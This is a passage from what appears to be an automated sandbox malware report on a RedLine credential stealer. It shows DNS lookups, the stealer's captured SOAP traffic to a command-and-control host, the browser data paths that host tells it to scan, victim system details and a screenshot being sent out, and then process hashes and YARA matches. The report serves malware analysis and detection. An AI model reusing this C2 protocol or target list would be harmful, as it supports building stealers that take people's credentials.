Sep 19, 2023 21:07:34.809796095 CEST	8.8.8.8	192.168.2.6	0xb81b	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 19, 2023 21:07:34.916485071 CEST	8.8.8.8	192.168.2.6	0x5159	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 19, 2023 21:07:37.286955118 CEST	8.8.8.8	192.168.2.6	0xadca	No error (0)	jul-nelson.gl.at.ply.gg		147.185.221.16	A (IP address)	IN (0x0001)	false
Sep 19, 2023 21:07:54.513254881 CEST	8.8.8.8	192.168.2.6	0xd15d	No error (0)	jul-nelson.gl.at.ply.gg		147.185.221.16	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jul-nelson.gl.at.ply.gg:47198

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49706	147.185.221.16	47198	C:\Users\user\Desktop\4JL966sxM4.exe

Timestamp	kBytes transferred	Direction	Data
Sep 19, 2023 21:07:28.380541086 CEST	101	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: jul-nelson.gl.at.ply.gg:47198 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Sep 19, 2023 21:07:28.908195972 CEST	101	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: jul-nelson.gl.at.ply.gg:47198 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Sep 19, 2023 21:07:29.229818106 CEST	102	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 19 Sep 2023 19:07:29 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Sep 19, 2023 21:07:29.539917946 CEST	102	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 19 Sep 2023 19:07:29 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Sep 19, 2023 21:07:34.331543922 CEST	103	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: jul-nelson.gl.at.ply.gg:47198 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Sep 19, 2023 21:07:34.665342093 CEST	104	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 19 Sep 2023 19:07:34 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFIL

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49710	147.185.221.16	47198	C:\Users\user\Desktop\4JL966sxM4.exe

Timestamp	kBytes transferred	Direction	Data
Sep 19, 2023 21:07:40.507453918 CEST	137	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: jul-nelson.gl.at.ply.gg:47198 Content-Length: 1162728 Expect: 100-continue Accept-Encoding: gzip, deflate
Sep 19, 2023 21:07:41.533979893 CEST	144	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: jul-nelson.gl.at.ply.gg:47198 Content-Length: 1162728 Expect: 100-continue Accept-Encoding: gzip, deflate Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 44 65 73 6b 74 6f 70 5c 34 4a 4c 39 36 36 73 78 4d 34 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 30 44 43 31 44 32 30 35 33 39 38 31 45 41 46 44 30 34 46 43 37 37 39 31 31 41 35 39 30 44 45 44 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 30 39 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 65 6e 67 69 6e 65 65 72 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 50 2b 6c 53 55 52 42 56 48 68 65 37 4c 30 48 75 47 31 56 65 65 35 2f 39 73 61 72 78 6f 49 6d 53 43 2b 48 62 71 38 78 4a 68 65 69 71 43 67 61 65 30 77 30 4d 65 57 66 33 4a 43 67 55 75 79 4b 49 6c 59 43 49 76 56 51 70 54 64 46 45 58 75 6a 32 46 50 75 6a 52 30 37 49 69 43 49 69 76 53 71 31 41 50 6a 50 37 34 78 35 7a 66 57 4f 37 37 35 7a 6a 4c 6d 6d 6d 76 74 74 63 39 5a 36 33 6c 2b 7a 39 70 72 39 44 36 2b 38 65 34 78 31 31 71 78 59 76 33 48 75 78 55 62 50 4b 46 67 77 79 65 36 46 52 73 39 4b 62 43 77 38 52 2b 58 2f 45 6b 6a 4b 7a 62 2b 30 34 53 46 54 66 34 73 6a 34 31 33 4c 4e 6a 30 7a 78 4e 57 62 46 61 79 2b 56 4d 4c 74 69 68 5a 2b 62 52 6d 74 6e 68 36 79 75 59 37 70 63 52 77 6b 71 37 6b 73 55 50 4b 35 6a 75 32 41 2b 45 58 49 76 38 37 73 6d 4c 54 50 78 75 78 69 57 38 58 59 65 4d 6e 56 39 6e 6f 6a 33 32 62 41 78 76 34 74 74 65 2b 57 4c 2b 47 44 52 34 58 57 46 69 2f 65 46 2f 78 4d 4f 67 2f 52 66 6f 52 30 32 31 69 49 79 6b 48 77 4d 4c 30 6f 53 6d 39 55 4d 38 53 56 73 65 4f 4c 47 7a 51 6f 5a 35 59 74 7a 5a 59 66 49 73 4a 76 37 42 42 77 59 72 31 70 53 35 49 57 55 59 67 39 46 56 58 79 76 69 44 4d 6c 44 61 30 75 36 42 44 52 2f 76 46 6a 63 51 48 68 64 59 57 50 2b 78 67 52 55 50 65 38 77 55 6b 66 77 6b 33 32 4a 4f 57 4b 79 66 44 63 2f 71 4e 31 47 77 6a 38 65 42 70 64 30 44 62 4a 74 65 36 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironment xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\Desktop\4JL966sxM4.exe</a:FileLocation><a:Hardware>0DC1D2053981EAFD04FC77911A590DED</a:Hardware><a:IPv4>191.96.150.209</a:IPv4><a:Language>English (United States)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>iVBORw0KGgoAAAANSUhEUgAABQAAAAQACAYAAAC+k/RDAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAP+lSURBVHhe7L0HuG1Vee5/9sarxoImSC+Hbq8xJheiqCgae0w0MeWf3JCgUuyKIlYCIvVQpTdFEXuj2FPujR07IiCIivSq1APjP74x5zfWO775zjLmmmvttc9Z63l+z9pr9D6+8e4x11qxYv3HuxUbPKFgwye6FRs9KbCw8R+X/EkjKzb+04SFTf4sj413LNj0zxNWbFay+VMLtihZ+bRmtnh6yuY7pcRwkq7ksUPK5ju2A+EXIv87smLTPxuxiW8XYeMnV9noj32bAxv4tte+WL+GDR4XWFi/eF/xMOg/RfoR021iIykHwML0oSm9UM8SVseOLGzQoZ5YtzZYfIsJv7BBwYr1pS5IWUYg9FVXyviDMlDa0u6BDR/vFjcQHhdYWP+xgRUPe8wUkfwk32JOWKyfDc/qN1Gwj8eBpd0DbJte6
Sep 19, 2023 21:07:54.385389090 CEST	1328	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 19 Sep 2023 19:07:54 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Sep 19, 2023 21:07:54.727366924 CEST	1329	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 19 Sep 2023 19:07:54 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49714	147.185.221.16	47198	C:\Users\user\Desktop\4JL966sxM4.exe

Timestamp	kBytes transferred	Direction	Data
Sep 19, 2023 21:07:54.739373922 CEST	1329	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: jul-nelson.gl.at.ply.gg:47198 Content-Length: 1162720 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Sep 19, 2023 21:07:55.267412901 CEST	1329	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: jul-nelson.gl.at.ply.gg:47198 Content-Length: 1162720 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Sep 19, 2023 21:07:55.628812075 CEST	1341	IN	HTTP/1.1 100 Continue
Sep 19, 2023 21:07:55.967850924 CEST	1366	IN	HTTP/1.1 100 Continue
Sep 19, 2023 21:07:58.759594917 CEST	2508	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 19 Sep 2023 19:07:58 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
Sep 19, 2023 21:07:59.093259096 CEST	2508	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 19 Sep 2023 19:07:58 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	21:07:26
Start date:	19/09/2023
Path:	C:\Users\user\Desktop\4JL966sxM4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\4JL966sxM4.exe
Imagebase:	0xc10000
File size:	97'792 bytes
MD5 hash:	B83C75E00F5F8D62DE662451B631278B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:07:26
Start date:	19/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6eb1a0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 05576F00 Relevance: 2.9, Strings: 2, Instructions: 384COMMON

Download Yara Rule

Strings

XXQq, xrefs: 05577211
XXQq, xrefs: 05577363

Memory Dump Source

Source File: 00000000.00000002.339632789.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5570000_4JL966sxM4.jbxd

Similarity

API ID:
String ID: XXQq$XXQq
API String ID: 0-812244970
Opcode ID: 18d978a60a400ae7066c21d755653fb8c298503511d3d1e8f1be761a7b07a1de
Instruction ID: da497d52595df0bb5d32df68fc5075fd983b43253187a38f146ece9ec83d5c4f
Opcode Fuzzy Hash: 18d978a60a400ae7066c21d755653fb8c298503511d3d1e8f1be761a7b07a1de
Instruction Fuzzy Hash: B9D1E53171020A9FCB15EB79E480AAEB7E3FF84214F54C92AD6169B398DF30AC45C791

Uniqueness

Uniqueness Score: -1.00%

Function 05574D20 Relevance: 1.9, Strings: 1, Instructions: 614COMMON

Download Yara Rule

Strings

(Uq, xrefs: 05575201

Memory Dump Source

Source File: 00000000.00000002.339632789.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5570000_4JL966sxM4.jbxd

Similarity

API ID:
String ID: (Uq
API String ID: 0-2564861378
Opcode ID: 1b4664bc14df7e0c551c61763ffa50950537f792798b07c22ae06bf66a212400
Instruction ID: 049cecbfec3b209c984986bae8a7cabf02bbba9978ff39e9bf4ccde577a08195
Opcode Fuzzy Hash: 1b4664bc14df7e0c551c61763ffa50950537f792798b07c22ae06bf66a212400
Instruction Fuzzy Hash: 77327C75B042098FCB15DF69E494AAEBBF2FF88211F148469E856DB351EB34EC41CB90

Uniqueness

Uniqueness Score: -1.00%

